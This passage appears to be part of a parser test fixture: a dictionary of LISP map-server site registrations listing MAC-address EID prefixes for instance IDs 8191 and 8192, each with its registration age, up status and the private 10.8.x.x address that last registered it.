"inst_id": 8191,
},
"c414.3cff.63f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"c414.3cff.d74c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.166:31256",
"inst_id": 8191,
},
"c4b3.6aff.77c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c4b3.6aff.d501/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c4b3.6aff.d525/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"c4b3.6aff.95d7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"c4b3.6aff.a1e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"cc5a.53ff.26d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"cc5a.53ff.a5c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"d057.4cff.1cb2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"d057.4cff.1d09/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"d057.4cff.12d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"d0c2.82ff.7da1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"d0ec.35ff.02a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"d0ec.35ff.9754/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"d0ec.35ff.5393/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"d4ad.71ff.85df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"d4ad.71ff.867b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"d4ad.71ff.8d7d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"d4ad.71ff.9785/48": {
"last_register": "2d03h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"d4ad.71ff.e682/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"d4ad.71ff.f88e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"d4ad.bdff.e91b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"d824.bdff.c2e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"d824.bdff.28d1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"dc8c.37ff.1148/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"dceb.94ff.60f7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dceb.94ff.6002/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.8fb4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dceb.94ff.a43e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"dceb.94ff.bba2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.bbaf/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"dceb.94ff.6f7d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"dceb.94ff.7379/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"dceb.94ff.7475/48": {
"last_register": "00:04:52",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dceb.94ff.8275/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"dceb.94ff.8303/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"dcf7.19ff.fd09/48": {
"last_register": "05:00:53",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"dcf7.19ff.4633/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"dcf7.19ff.46ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"dcf7.19ff.4756/48": {
"last_register": "03:00:56",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dcf7.19ff.5509/48": {
"last_register": "05:17:50",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"dcf7.19ff.550c/48": {
"last_register": "03:19:12",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"dcf7.19ff.5db6/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"dcf7.19ff.6188/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"dcf7.19ff.631a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"e089.9dff.4cad/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e0d1.73ff.47c6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"e4aa.5dff.9616/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"e4aa.5dff.961a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.962a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"e4aa.5dff.9632/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"e4aa.5dff.964e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.9782/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"e4aa.5dff.978a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.9796/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"e4aa.5dff.98a5/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"e4aa.5dff.ef93/48": {
"last_register": "00:01:27",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"e4aa.5dff.f047/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"e4aa.5dff.f3ca/48": {
"last_register": "00:02:24",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"e4aa.5dff.05ec/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4aa.5dff.0856/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"e4c7.22ff.ea8a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.d1ca/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.de2f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.e069/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.3e7a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e4c7.22ff.8f6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"e4c7.22ff.dd93/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.045c/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.05e7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.13ef/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"e4c7.22ff.143c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.166f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"e4c7.22ff.8239/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"e4c7.22ff.954c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.9565/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.9cd1/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.9cd2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4c7.22ff.9c16/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.f56f/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.033f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"e4c7.22ff.267a/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e4c7.22ff.3a51/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.4d45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"e4c7.22ff.3cf9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e4c7.22ff.42d7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"e4c7.22ff.47d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"e4c7.22ff.290c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"e4c7.22ff.70c2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"e4c7.22ff.7564/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"e840.40ff.001f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"e8ba.70ff.b489/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"e8ba.70ff.0643/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.97:26541",
"inst_id": 8191,
},
"ecc8.82ff.f783/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"f029.29ff.a0cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"f029.29ff.a19a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"f029.29ff.a753/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"f029.29ff.a953/48": {
"last_register": "00:02:19",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"f029.29ff.2548/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"f029.29ff.33cf/48": {
"last_register": "2d19h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.325c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.3808/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"f07f.06ff.4062/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.44f9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"f07f.06ff.4614/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"f07f.06ff.47fa/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"f07f.06ff.4b72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f07f.06ff.5adc/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"f07f.06ff.660a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"f07f.06ff.a05e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f07f.06ff.c8d6/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"f07f.06ff.c8e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"f07f.06ff.c804/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"f41f.c2ff.477c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"f4ea.67ff.5bd7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f4ea.67ff.5b46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f87b.20ff.c977/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"f8a5.c5ff.98c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.23:20011",
"inst_id": 8191,
},
"f8a5.c5ff.d71f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"f8a5.c5ff.e172/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"f8a5.c5ff.1dcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"f8a5.c5ff.3a2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
}
},
},
8192: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8192,
},
"0002.d1ff.bb40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0002.d1ff.2b65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"000f.e5ff.80b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"000f.e5ff.80b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"000f.e5ff.80bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.bf46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.bf4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.bf4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"000f.e5ff.e915/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"000f.e5ff.e91c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0017.5aff.b156/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b159/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b15b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0017.5aff.b161/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0017.5aff.b169/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8192,
},
"0017.5aff.b183/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"0017.5aff.b184/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b187/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8192,
},
"0017.5aff.b18a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0017.5aff.c321/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8192,
},
"0017.5aff.c322/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0017.5aff.c324/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8192,
},
"00a2.eeff.29cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2ae3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"00a2.eeff.2a3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2a40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"00a2.eeff.2a41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2a42/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"00a2.eeff.2a43/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8192,
},
"00a2.eeff.2f8b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"00e0.c9ff.7bea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"00e0.c9ff.9679/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"00e0.c9ff.a7b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.b120/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.b13f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.c007/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.c121/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8192,
},
"0c75.bdff.c150/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.c154/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.c164/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8192,
},
"0c75.bdff.4472/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.447e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.447f/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.448a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.448f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4491/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.46f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4601/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4602/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4603/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.460b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"0c75.bdff.460c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4610/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8192,
},
"0c75.bdff.4712/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.4713/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4717/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.4719/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.471a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.471d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.471e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4723/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4731/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.4732/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4733/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.473a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4741/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4761/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8192,
},
"0c75.bdff.48d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.4bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8192,
},
"0c75.bdff.4da4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4dae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8192,
},
"0c75.bdff.4dc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.4dc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.4dca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8192,
},
"0c75.bdff.00c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8192,
},
"0c75.bdff.01cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8192,
},
"0c75.bdff.da7a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.dbfa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.3631/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8192,
},
"0c75.bdff.3b13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8192,
},
"0c75.bdff.3b16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
